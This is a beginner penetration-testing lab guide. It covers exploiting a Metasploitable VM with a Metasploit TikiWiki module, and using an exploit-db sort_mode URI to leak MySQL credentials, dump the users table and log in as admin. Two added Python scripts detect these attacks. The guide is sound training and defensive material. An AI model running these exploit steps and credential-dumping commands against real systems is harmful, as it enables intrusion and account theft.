Intro To Penetration Testing - Lab Guide Three
Exploitation
n00bpentesting.com
Twitter @shai_saint

May 29, 2018

Contents

Prerequisites
  Hardware
  Software
Topics Covered
A Note
Before You Begin
Lab 0ne – Exploitation
Answer: Exploit-db Challenge
What’s Next?


Prerequisites

Thank you for downloading the n00bpentesting.com Lab Guide Three. This guide is designed to help the n00b penetration tester get their feet wet with some of the tools covered on n00bpentesting.com while honing their skills following the Penetration Testing Execution Standard.

Hardware

• Computer with Linux, Windows, or Mac OSX
• 4GB RAM
• Hard-drive with at least 50GB

Software

• VirtualBox Virtualization Software
  http://www.virtualbox.org/wiki/Downloads
• BackTrack 5 R1 Virtual Machine
  http://www.backtrack-linux.org/downloads
• Windows XP SP2 Virtual Machine – supply your own copy or use a NIST image
  NIST - http://nvd.nist.gov/fdcc/download_fdcc.cfm
• Metasploitable Virtual Machine
  http://updates.metaspoit.com/data/Metasploitable.zip.torrent


Topics Covered

• Exploitation

A Note

All n00bpentesting.com guides will follow applicable sections of the Penetration Testing Execution Standard (PTES). It is highly recommended that any penetration tester, or anyone who wants to move into this field, read and regularly reference the standard. It can be found here: http://www.pentest-standard.org/

Before You Begin

It is important to update BackTrack, SET, and Metasploit before you begin each lesson. Updating these packages will ensure the latest tool updates and fixes are applied for better stability and exploit success.

To Update BackTrack
At the command prompt type: apt-get update && apt-get upgrade && apt-get dist-upgrade, press ENTER

To Update SET
At the command prompt type: cd /pentest/exploits/set && svn update, press ENTER

To Update Metasploit
At the command prompt type: cd /pentest/exploits/framework && svn update, press ENTER


Lab 0ne – Exploitation

In this lab you will learn how to leverage the vulnerability you verified with metasploit to exploit the target. You have researched the applications on the target system and verified that there is a vulnerability to exploit using metasploit. We will use the “tikiwiki_graph_formula_exec” exploit module. I will also share the answer to the exploit-db challenge.

1. Start the BackTrack VM
2. Start the metasploitable VM
3. In the BackTrack VM, update metasploit by typing at the command prompt: msfupdate, press ENTER
   Once the update is finished you will be at revision 14418 or higher.
4. Start metasploit, at the command prompt type: msfconsole, press ENTER
   When metasploit is started, you will see when it was last updated.

We will now instruct metasploit to use the exploit we researched: “tikiwiki_graph_formula_exec”.


5. At the msfconsole type: use exploit/unix/webapp/tikiwiki_graph_formula_exec, press ENTER

We will need to tell the exploit the target IP address.

6. At the msfconsole type: show options

This will show the available options that can be configured for the exploit. Some options such as RPORT and URI already have settings and are fine as set. We need to provide the RHOST.


7. At the msfconsole type: set RHOST “metasploitable_IP_Address”, press ENTER

This is the only option we need to set; we are now ready to exploit our target.

8. At the msfconsole type: exploit, press ENTER
   The exploit will run and when successful you will be returned a Meterpreter session.

You have successfully run the exploit on the target system. Meterpreter is a very powerful command shell that has many great features.

9. To see what commands are available, at the meterpreter prompt type: help, press ENTER


Take time to look at all the available commands, in particular the File system commands.

Other commands that are important:

• getuid – show which user the current process is running as
• cd – change directory
• ls – list directory contents
• download – download files from the target

At this point our exploit process is running as www-data. This user will not have the privileges required to make system changes; however, we can still download the /etc/passwd file to get usernames for password brute force attacks.


Also, look at the output provided by the exploit. It looks like we obtained the mysql database credentials. Ponder the possibilities.
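A defender-side check for the situation this lab produces, added here as an example and not part of the n00bpentesting.com guide: the Meterpreter session runs as www-data underneath an apache2 worker, so a shell or interpreter whose process ancestry leads back to the web server is a strong sign that a web application has been exploited. The script parses `ps -eo user,pid,ppid,comm` style output and walks the parent chain of every shell-like process. The process listing below is constructed for the example, not captured from Metasploitable, and the sets of web-server and shell command names are assumptions to adjust for your own hosts.

```python
"""Flag shell-like processes that descend from a web server worker.

Added example, not code from the n00bpentesting.com guide. The exploit in the
lab leaves a Meterpreter session running as www-data under an apache2 worker;
this script finds that pattern in `ps -eo user,pid,ppid,comm` output.
"""

# Assumed command names; adjust for the web servers and interpreters in use.
WEB_SERVER_COMMS = {"apache2", "httpd", "nginx", "php-cgi", "php-fpm"}
SHELL_LIKE = {"sh", "bash", "dash", "perl", "python", "nc", "telnet"}

# Constructed sample of `ps -eo user,pid,ppid,comm` output (not a real capture).
SAMPLE_PS = """\
USER       PID  PPID COMMAND
root         1     0 init
root      1203     1 apache2
www-data  1210  1203 apache2
www-data  1211  1203 apache2
www-data  1342  1211 sh
www-data  1343  1342 perl
mysql     1100     1 mysqld
root      1400     1 sshd
msfadmin  1450  1400 bash
"""


def parse_ps(text):
    """Return {pid: (user, ppid, comm)} from ps output, skipping the header row."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) != 4:
            continue
        user, pid, ppid, comm = parts
        procs[int(pid)] = (user, int(ppid), comm)
    return procs


def ancestors(procs, pid):
    """Yield the command names of pid's ancestors, nearest parent first."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        _user, ppid, comm = procs[pid]
        yield comm
        pid = ppid


def find_web_shells(procs):
    """Return [(pid, user, comm, web_server_comm)] for every shell-like process
    that has a web server process somewhere above it in the tree."""
    findings = []
    for pid, (user, ppid, comm) in procs.items():
        if comm not in SHELL_LIKE:
            continue
        for anc in ancestors(procs, ppid):
            if anc in WEB_SERVER_COMMS:
                findings.append((pid, user, comm, anc))
                break
    return sorted(findings)


if __name__ == "__main__":
    for pid, user, comm, parent in find_web_shells(parse_ps(SAMPLE_PS)):
        print(f"ALERT pid={pid} user={user} cmd={comm} spawned under {parent}")
```

The walk stops at the first web-server ancestor, so the perl child of the sh process is reported on its own rather than only through its parent; the msfadmin bash session under sshd is left alone because nothing above it is a web server. On a real host the same logic can be fed from `ps -eo user,pid,ppid,comm` on a schedule, and the www-data account reading /etc/passwd or opening outbound connections is the next thing to look for once a hit appears.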


Answer: Exploit-db Challenge

During the vulnerability research phase there were several exploits available for tikiwiki at exploit-db.com. Let’s take a look at “TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability”.

1. Open your browser and go to: www.exploit-db.com
2. Search for “tikiwi”


3. Click on the name of the exploit “TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability”.

A brief description of the exploit is provided, followed by a list of URIs that can be appended to the web application root to dump the database credentials.

4. Open your browser and in the URL address field type: http://metasploitable_IP_Address/tikiwiki
5. Copy the first URI from exploit-db: /tiki-listpages.php?offset=0&sort_mode=
6. Paste this URI after http://metasploitable_IP_Address/tikiwiki
   It will look like this: http://192.168.99.102/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
7. Press ENTER


The web page will show an error.


8. Scroll down the page and you will be presented with the mysql database credentials.

These DB credentials can now be used to login to the mysql database.

9. Open a command shell and type: mysql -h “metasploitable_IP_Address” -uroot -proot, press ENTER

You are now logged in to the mysql database as the root user. Let’s get the user information from the database.

10. At the mysql prompt type: use tikiwiki195; press ENTER
    (make sure you type a semi-colon (;) after each command)
    A message will indicate that the database has been changed.

Let’s see what tables exist in the database.


11. At the mysql prompt type: show tables;
    A long list of tables will print. We are interested in users_users in the list. To view the contents of the table we need to perform a database function called “select”.
12. At the mysql prompt type: select * FROM users_users;
    Users currently in the database will be displayed. The user admin with the password admin looks like a good account.

Let’s go back to the web page for tikiwiki and login with these credentials.

13. In your browser go to: http://metasploitable_IP_Address/tikiwiki
14. In the login form enter: admin for both the user and pass, click login

You will be prompted to change the password; make it something easy like “pass123”. You are now logged into the web application as the administrator!
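A detection for the exploit-db challenge above, added here as an example and not part of the n00bpentesting.com guide: the disclosure is triggered by a request to tiki-listpages.php with an empty sort_mode parameter, and the error page that results is what exposes the database credentials, so both that request pattern and server errors on the application are worth alerting on in the web server's access log. The log lines below are constructed for the example; the /tikiwiki/ path prefix and the Apache combined log format are assumptions.

```python
"""Scan Apache access log lines for the TikiWiki sort_mode disclosure probe.

Added example, not code from the n00bpentesting.com guide. It flags requests to
tiki-listpages.php that carry an empty sort_mode value (the exploit-db URI used
in the challenge) and any server error on the application, since the error page
is what exposes the database credentials.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
APP_PREFIX = "/tikiwiki/"  # assumed install path of the web application

# Constructed sample log lines (not a capture from Metasploitable).
SAMPLE_LOG = """\
192.168.99.101 - - [29/May/2018:10:01:02 -0400] "GET /tikiwiki/tiki-index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.99.101 - - [29/May/2018:10:01:09 -0400] "GET /tikiwiki/tiki-listpages.php?offset=0&sort_mode=created_desc HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
192.168.99.102 - - [29/May/2018:10:02:15 -0400] "GET /tikiwiki/tiki-listpages.php?offset=0&sort_mode= HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.99.102 - - [29/May/2018:10:02:40 -0400] "GET /tikiwiki/tiki-index.php?page=HomePage HTTP/1.1" 500 1544 "-" "Mozilla/5.0"
this line is malformed and must be skipped
"""


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_sort_mode_probe(target):
    """True for tiki-listpages.php requests whose sort_mode parameter is empty."""
    parts = urlsplit(target)
    if not parts.path.endswith("/tiki-listpages.php"):
        return False
    query = parse_qs(parts.query, keep_blank_values=True)
    return any(value == "" for value in query.get("sort_mode", []))


def scan_log(text):
    """Return [(client_ip, reason, target)] for every suspicious request."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if is_sort_mode_probe(rec["target"]):
            findings.append((rec["ip"], "empty sort_mode on tiki-listpages.php", rec["target"]))
        elif rec["status"] >= 500 and rec["target"].startswith(APP_PREFIX):
            findings.append((rec["ip"], "server error on the web application", rec["target"]))
    return findings


def probes_per_client(findings):
    """Count findings by client IP so repeat offenders stand out."""
    return Counter(ip for ip, _reason, _target in findings)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for ip, reason, target in results:
        print(f"{ip}: {reason}: {target}")
    print(dict(probes_per_client(results)))
```

The empty-parameter test uses keep_blank_values so that `sort_mode=` is seen at all; a plain parse_qs call drops blank values and would miss the probe entirely. Detection only catches the request, though: the controls that actually close the chain in steps 8 and 9 are stopping the application from printing database errors (and with them the credentials) to the browser, and not letting the database accept remote root logins with a trivial password.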


What’s Next?

The next step is Post Exploitation. Please see “Intro To Penetration Testing – Lab Guide Four”.